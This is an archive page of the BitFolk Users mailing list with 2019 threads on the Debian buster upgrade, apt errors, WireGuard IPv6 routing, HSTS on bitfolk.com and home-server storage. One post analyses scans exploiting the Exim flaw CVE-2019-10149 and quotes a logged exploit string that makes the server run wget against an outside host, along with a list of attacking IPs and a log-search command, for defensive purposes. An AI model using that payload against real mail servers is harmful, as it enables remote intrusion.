BitFolk Users

users@mailman.bitfolk.com

1117 discussions

The forthcoming Debian 10.0 (buster) release

by Andy Smith

Hello, Debian 10 (buster) is supposed to be released later today. Those who wish to upgrade to it in the usual Debian way should be able to do so after reading the release notes for any gotchas: https://www.debian.org/releases/testing/amd64/release-notes/ I am not aware of any gotchas that are specific to the BitFolk environment, but if you think you have found one please do let us know. If planning a clean install, the "buster" release has been available for some time in our Xen Shell, but under the code name "debian_testing", because right now it still is technically the testing release. If you issue the command: xen shell> install debian_testing now or at any time after the release of Debian 10 then I believe this should result in a working install of Debian 10. I just tested it with a minimal install (base system + openssh) and it seems to (still) work. It may be several days after the release before we can get around to updating the labels in the Xen Shell so that "debian_buster" is there and "debian_testing" gets you "bullseye". It does tell you what it's going to install so there should be no confusion. Cheers, Andy -- https://bitfolk.com/ -- No-nonsense VPS hosting _______________________________________________ announce mailing list announce(a)lists.bitfolk.com https://lists.bitfolk.com/mailman/listinfo/announce

5 years, 5 months

Fwd: The forthcoming Debian 10.0 (buster) release

by Keith Williams

---------- Forwarded message --------- From: Keith Williams <keithwilliamsnp(a)gmail.com> Date: Sun, 7 Jul 2019 at 14:57 Subject: Re: [bitfolk] The forthcoming Debian 10.0 (buster) release To: Hugo Mills <hugo-bf(a)carfax.org.uk> I was reading in the pages and pages of guidance notes that there can be a problem with entropy starvation, even to the extent of SSH not working properly. Debian recommend doing a lot of pings as soon as you can to build up the entropy. Of course, how you do that during an install is another matter... Keith On Sun, 7 Jul 2019 at 14:06, Hugo Mills <hugo-bf(a)carfax.org.uk> wrote: > On Sun, Jul 07, 2019 at 01:55:46PM +0100, Keith Williams wrote: > > Well I have done the upgrade on one VPS. Preparation including backing up > > all db and /etc/ plus one or two other "just in case" files and > > uninstalling packages that were never installed from official archives 3 > or > > 4 hours, upgrade itself few minutes, sorting out problems all the rest of > > the morning. > > Problems encountered:- > > Bind. Over several upgrades I have always kept the old config files. It > > seems that some ancient deprecated options now throw an error not a > > warning. systemctl start followed by journalctl -xe details all the > > problems, even the line numbers in the files so it was a matter of > minutes > > to fix > > Wireguard still seems to need the unstable repository, so changing that > > back it all worked, the conf file was still there so OK, same could not > be > > said of NFTables, had to reload conf file from back up. > > Then the 3 bigger ones:- > > Roundcube. During install it said it had to reconfigure the database. I > > will have to purge, drop that database and reinstall from scratch > > unfortunately > > Dovecot. My initial setting up, a few years back took ages (I was > learning > > as I went) so I said no to replacing conf files. Had same problem as with > > Bind, setting which before led to a warning, now stop it from starting. > > Same trick as before and only one setting to change. The error message > even > > tells you what to change it to. I should have heeded the warnings before. > > But it does mean that although Dovecot is delivering the mail to the > boxes, > > I am unable to log onto Postfix as it uses Dovecot to verify credentials. > > But then my webmail uses Roundcube so I can't get at that mail at the > > moment anyway > > Webmin. I use this as a graphical interface when working with big > databases > > or updating and cleaning up all my zonefiles. It's just easier. Handy for > > editing Apache virtual host files. I was able to install it and start it > > then the connection drops to the miniserv server. I think it is related > to > > an upgrading of the perl libraries in the upgrade. Did not have the same > > with my home boxes a couple of weeks ago. That is non urgent though. > > Hopefully some lessons learnt so mistakes won't be repeated during > upgrade > > of my other VPS tomorrow. Most of these irritations would probably not > have > > arisen if I had cleaned up the conf files beforehand. > > Hope there is something useful there for anyone else upgrading > > I'm doing a reinstall from scratch on a new VPS. So far, I haven't > hit anything awkward (other than not knowing how to set up nginx -- I > decided to switch from Apache). > > My only real issue so far is that writing random data to the 250 > GiB encrypted archive-storage volume took about 6 hours. I'm not sure > if that's entropy starvation on the randomness, very slow storage, or > slow CPU doing the encryption. I was doing it in the installer, so I > didn't have much leeway to investigate deeper. > > Hugo. > > > Keith > > > > On Sat, 6 Jul 2019 at 00:16, Andy Smith <andy(a)bitfolk.com> wrote: > > > > > Hello, > > > > > > Debian 10 (buster) is supposed to be released later today. Those who > > > wish to upgrade to it in the usual Debian way should be able to do > > > so after reading the release notes for any gotchas: > > > > > > https://www.debian.org/releases/testing/amd64/release-notes/ > > > > > > I am not aware of any gotchas that are specific to the BitFolk > > > environment, but if you think you have found one please do let us > > > know. > > > > > > If planning a clean install, the "buster" release has been available > > > for some time in our Xen Shell, but under the code name > > > "debian_testing", because right now it still is technically the > > > testing release. > > > > > > If you issue the command: > > > > > > xen shell> install debian_testing > > > > > > now or at any time after the release of Debian 10 then I believe > > > this should result in a working install of Debian 10. I just tested > > > it with a minimal install (base system + openssh) and it seems to > > > (still) work. > > > > > > It may be several days after the release before we can get around to > > > updating the labels in the Xen Shell so that "debian_buster" is there > > > and "debian_testing" gets you "bullseye". It does tell you what it's > > > going to install so there should be no confusion. > > > > > > Cheers, > > > Andy > > > > > -- > Hugo Mills | One of these days, I'll catch that man without a > hugo@... carfax.org.uk | quotation, and he'll look undressed. > http://carfax.org.uk/ | > PGP: E2AB1DE4 | Leto Atreides, > Dune >

5 years, 5 months

apt errors after Buster release

by Mike Zanker

Today I’ve been getting the following errors from “apt-get update”: E: Repository 'http://deb.debian.org/debian buster InRelease' changed its 'Suite' value from 'testing' to 'stable <http://deb.debian.org/debian%20buster%20InRelease'%20changed%20its%20'Suite'%20value%20from%20'testing'%20to%20'stable>' E: Repository 'http://deb.debian.org/debian-security buster/updates InRelease' changed its 'Suite' value from 'testing' to 'stable <http://deb.debian.org/debian-security%20buster/updates%20InRelease'%20changed%20its%20'Suite'%20value%20from%20'testing'%20to%20'stable>' E: Repository 'http://deb.debian.org/debian buster-updates InRelease' changed its 'Suite' value from 'testing-updates' to 'stable-updates <http://deb.debian.org/debian%20buster-updates%20InRelease'%20changed%20its%20'Suite'%20value%20from%20'testing-updates'%20to%20'stable-updates>’ The solution (for me) was to run apt-get update --allow-releaseinfo-change once. Thought this might be useful for anybody else hitting the same issue. Cheers, Mike

5 years, 5 months

Stretch after Buster becomes "stable"

by Mike Zanker

I’m already running a couple of fresh installs of Buster outside of Bitfolk, but I’d like to keep my VPS running Stretch for the time being. Do I need to make any changes to sources.list to carry on receiving security updates? I’ve currently got this: deb http://deb.debian.org/debian stretch main deb-src http://deb.debian.org/debian stretch main deb http://deb.debian.org/debian-security/ stretch/updates main deb-src http://deb.debian.org/debian-security/ stretch/updates main deb http://deb.debian.org/debian stretch-updates main deb-src http://deb.debian.org/debian stretch-updates main Cheers, Mike

5 years, 5 months

How to set up 2 default routes for IPv6 on Debian automatically on boot to give a fall back

by Keith Williams

Sorry long long post. tl;dr 2 default IPv6 routes different metrics set up persistent on Debian. I need a bit of advice concerning routing IPv6. Here is the problem. I do quite a bit of travelling around and a lot of it in SE Asia. I frequently find my self where the relevant ISP does not provide IPv6 connectivity. Even here at home my connection will occasionally change my address or I have to reboot the router and get a different one. I do things over the net for which I want IPv6, but also for DNS I need a stable fixed address. So I have an additional /56 subnet allocated to my VPS. Over the years I have tinkered with different VPN solutions to push these addresses down to my home network. I have found a different solution which not only was easy to set up, but works a dream except for one tiny issue. The /56 has been added to eth0 of my VPS. I am running wireguard and have it set up interface wg0 to which I route a /60 subnet. <bitfolk prefix>:e10::/60. Packets hitting this are encrypted with the server key and then encapsulated in IPv4 UDP packets and sent to the wg0 interface on my home machine, decrypted and if meeting criteria move through firewall etc. Sending out it is the same in reverse, encryption being via the client keypair. The client wg0 has subnet <bitfolk prefix>:e10::2/64, the server only accepting packets from this range and properly encrypted. Now here comes the problem. It is the default route issue. All that I read says that you cannot have 2 default routes in the same table. I have looked at a variety of solutions but find none except the one everyone seems to say is impossible but which works. I set the route *ip -6 route add ::0/0 dev wg0 metric 512. * Note the metric 512. The autoconfigured one has a metric of 1024. which gives me *ip -6 routedefault dev wg0 metric 512 pref mediumdefault via fe80::42c7:29ff:fe26:78c9 dev enp3s0 proto ra metric 1024 expires 265sec mtu 1488 hoplimit 64 pref medium* When I have finished fiddling and checking I will change the wg0 route to metric 2000 so that traffic will normally go through the main interface and when that has no IPv6 connectivity or is playing up, the wg0 route will be selected, (I hope). My 2 laptops, and Raspberry Pi will then be set up with their own wg1 etc interfaces and will then have their own /64 subnets. But when I try to get the route established automatically through the wireguard conf files or through PostUp I get the message can't do it as there is already an autoconfigured default. So I am stuck, at the moment with adding manually after every boot/reboot. Any suggestions please? VPS running Debian Stretch This box at home running Debian Buster. The only answer I can think of at the mo is turn off autoconfig, but then I lose this fallback mechanism and add difficulties with communicating with mobile phone/router etc. Or I guess I could forget the fancy fall back idea and just go through VPS but that could add a long delay when doing ordinary surfing. IPv4 of course just goes out through the normal interface

5 years, 5 months

Re: [bitfolk] HSTS fun on bitfolk.com

by Jess Robinson

Hi Andy, On 2019-07-01 09:58, Andy Smith wrote: > Hi Jess, > > On Mon, Jul 01, 2019 at 10:39:23AM +0100, Jess Robinson wrote: > > I eventually realised that the main bitfolk.com itself is sending > > hsts-required headers, and including all subdomains, which seems > > to trigger regardless of port :( Removing bitfolk.com fixed it for > > now, though presumably it will return if I visit the toplevel site > > again. > > TL;DR: Use example.vps.bitfolk.space. Aha! Do you need to add that for me? (didnt Just Work (tm)) > When I first started putting customers who did not have a domain of > their own under vps.bitfolk.com, I only ever thought that this would > be a short term arrangement for them. I didn't (and still don't) > really understand how anyone who would use a VPS would exist without > at least one domain name of their own. > > However, subsequent experience taught me that such people do exist, > in quite a number. It is perhaps not that they don't HAVE a domain > name, but that they do not wish to ADVERTISE any particular domain > name. > > I still don't understand it, but I accept that people keep wanting > to do this. Heh well, in the general case of actually deploying websites etc, I'd agree.. In this particular case I'm using my vps as a development box, cos its debian based, and sometimes easier to install stuff on than my desktop (which is gentoo) > Use of example.vps.bitfolk.com has a few different issues, such as > (non-exhaustive list): > > - Makes you subject to BitFolk's HSTS policy as you pointed out > > - May in future make you subject to Content Security Policy: > https://www.w3.org/TR/CSP3/ > > (bitfolk.com and panel.bitfolk.com have one but I don't think they > enforce it on subdomains at present) > > - Cross-domain leaking of cookies from .bitfolk.com to sub-domains. > > - Impossible for the customer to add extra DNS records like CNAME, > MX, AAAA, SRV, TXT or anything that might be generally useful in > one's own domain. > > HSTS is the real killer so far, so in January we introduced > the domain bitfolk.space and started putting customers who didn't > have a preference into vps.bitfolk.space instead, copying over all > existing records from under vps.bitfolk.com. > > We aren't going to enforce HSTS or anything like that on > bitfolk.space. At some point we will deprecate vps.bitfolk.com. I > still do not recommend long-term use of host names under > vps.bitfolk.space. > > HSTS etc won't be removed from bitfolk.com. It was a bad idea to > ever put customer stuff inside bitfolk.com. Aye, live and learn! Could you move jandj.vps.bitfolk.com over to .space please? (or do I need to email via the official support address for that..) Jess

5 years, 5 months

HSTS fun on bitfolk.com

by Jess Robinson

Yesterday I spent several hours trying to figure out why a dev website I am running on my bitfolk vps under a non-standard port, kept failing to load in my main browser - every time I visited it using http:// it kept directly requesting a https:// page .. which doesn't exist. I twigged fairly early (cos internet searchings) that it was probably something HSTS related (https://www.globalsign.com/en/blog/what-is-hsts-and-how-do-i-use-it/) .. but no amount of removing "jandj.vps.bitfolk.com" or "jandj.vps.bitfolk.com:8002" from hsts ( vivaldi://net-internals/#hsts ) was doing anything. I eventually realised that the main bitfolk.com itself is sending hsts-required headers, and including all subdomains, which seems to trigger regardless of port :( Removing bitfolk.com fixed it for now, though presumably it will return if I visit the toplevel site again. Any ideas if this can be worked around? (other than the obvious buy another domain / use one of my other ones temporarily) Jess

5 years, 5 months

Scans attempting to exploit CVE-2019-10149 have been in the wild for some days

by Andy Smith

Hello, I've just ran a grep on all of my mail logs for the string "run{" to see who's been trying to exploit CVE-2019-10149. A successful match looks like this on my MTA (Exim): 2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support(a)service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}(a)mail.bitfolk.com>: Unrouteable address This appears to be attempting to execute: sh -c "wget 64.50.180.45/tmp/85.119.82.70 on my host. I assume that the attacker watches their HTTP logs for requests for /tmp/85.119.82.70 and then they know they've found an exploitable host. Here's a list of offenders sorted by attempt count: Count Attacker Country AS ------------------------------------------------------------------------------------------------- 18 89.248.171.57 ( scanner20.openportstats.com) NL INT-NETWORK, SC [AS202425] 8 163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB AS12876, FR [AS12876] 6 104.237.134.176 (li810-176.members.linode.com) US LINODE-AP Linode, LLC, US [AS63949] 3 149.56.142.192 ( 192.ip-149-56-142.net) CA OVH, FR [AS16276] 3 104.200.137.239 ( mx239.odesktrack.com) US TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562] 2 27.69.172.229 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 95.139.230.110 (node-110-230-139-95.domolink.tula.net) RU ROSTELECOM-AS, RU [AS12389] 1 79.173.123.131 ( Unset reverse DNS) RU TKTOR, RU [AS44270] 1 46.150.228.178 ( Unset reverse DNS) RU ABRIKOS-AS, RU [AS196768] 1 27.70.156.161 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 27.69.172.239 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 27.69.172.214 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] Most worrying, a BitFolk IP was amongst my findings. i.e. there is a BitFolk customer VPS also doing this. Most likely they have already been compromised by this technique. I've removed them from the results above but I expect if you search your own logs you'll find them. They have already been notified. I created the above output with this script: https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f To use it in this case would be something like: $ zcat -f /var/log/exim4/mainlog* \ | grep "run{" \ | awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \ | sort | uniq -c | sort -rn | ~/attackers.sh The awk is separating an IP address out of the [1.2.3.4]. The sort/uniq/sort is generating an event count. attackers.sh is merely getting extra info about the IP address. Cheers, Andy -- https://bitfolk.com/ -- No-nonsense VPS hosting

5 years, 6 months

No 32-bit Ubuntu after 19.10

by Andy Smith

Hello, If I am reading this correctly: https://discourse.ubuntu.com/t/i386-architecture-will-be-dropped-starting-w… then 18.04 was the last LTS release of Ubuntu on 32-bit x86 CPUs. If you wish to run Ubuntu 20.04 at BitFolk then you will need to do that as 64-bit amd64. As Ubuntu supports 18.04 to some degree out to the year 2028, if you're currently on 32-bit then you could remain on that release for some time. Although you will of course find it harder and harder to get by with older package versions. If you are currently on 32-bit Ubuntu and wish to switch to 64-bit you can do so yourself by doing a self-install: https://tools.bitfolk.com/wiki/Using_the_self-serve_net_installer You would need to use the "arch" command first to switch from 32-bit to 64-bit. If re-installing is too much disruption, a reminder that we are happy to give you an additional VM for free for up to 2 weeks for you to migrate into: https://tools.bitfolk.com/wiki/Migrating_to_a_new_VPS Finally, it is possible to cross-grade from 32-bit to 64-bit, but the procedure is complicated, scary, and not supported by either Ubuntu or BitFolk. More info here: http://users.digitalkingdom.org/~rlpowell/hobbies/debian_arch_up/index.html https://wiki.debian.org/CrossGrading (Yes, these are for Debian, but the steps are basically the same for Ubuntu) The only BitFolk-specific deviation from the above procedure that is required is to make sure to use the "arch" command in the Xen Shell to switch to 64-bit before you try to boot your 64-bit kernel. Otherwise it starts a 32-bit boot loader that won't work. It won't hurt anything, it just won't work until you change it. Cheers, Andy -- https://bitfolk.com/ -- No-nonsense VPS hosting

5 years, 6 months

Filesystems/volume management for home servers

by Gavin Westwood

With the discussion about RAID 10, that got me back to thinking about better/alternative system to my current RAID1+LVM+EXT4 setup on our Linux home server and I'm looking for advice from other members. Currently we have 13.6 TB of storage (a lot of which are photos by my semi-professional girlfriend, and videos from our wildlife cam which produces about 15 - 20GB of videos a day [email me off-list if you want to want the URLs of my fledgling Youtube hedgehog and bird channels]). There is some amount of file duplication, for instance where I have stuck old backups (copied files and folders, not tar/compressed archives) on there or photos/videos have been copied to different folders (e.g. to categorise), so filesystems with built-in deduplication (like I believe BTRFS has) would be nice. However my main priorities are: maintaining data integrity, ease of administration, and really a sub-category of that: ease to expand or shrink and reallocate storage as required (if necessary - quotas are not required, but crashing due to a full disk is to be avoided). For years I have been looking at BTRFS, but it's never sounded 100% production ready to me (although I remember that at least one distro made it their default fs). Andy's mention of ceph and stratis were something new to me, but I'm not sure if they are a bit much for a single server, and I've no experience with ZFS, but I think I read about some disadvantages that put me off a few years back, but I forget what they were now. Anyway, what do/would you use for this sort of scenario/requirement or what are your experiences with suitable filesystems for my requirements? Just to be clear - I want to ensure that a single disk failure is very unlikely to result in data loss. Also, all disks are currently the spinning disk type, so any features that takes advantage of SSDs would be wasted. Thanks Gavin

5 years, 6 months

Jump to page:

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

BitFolk Users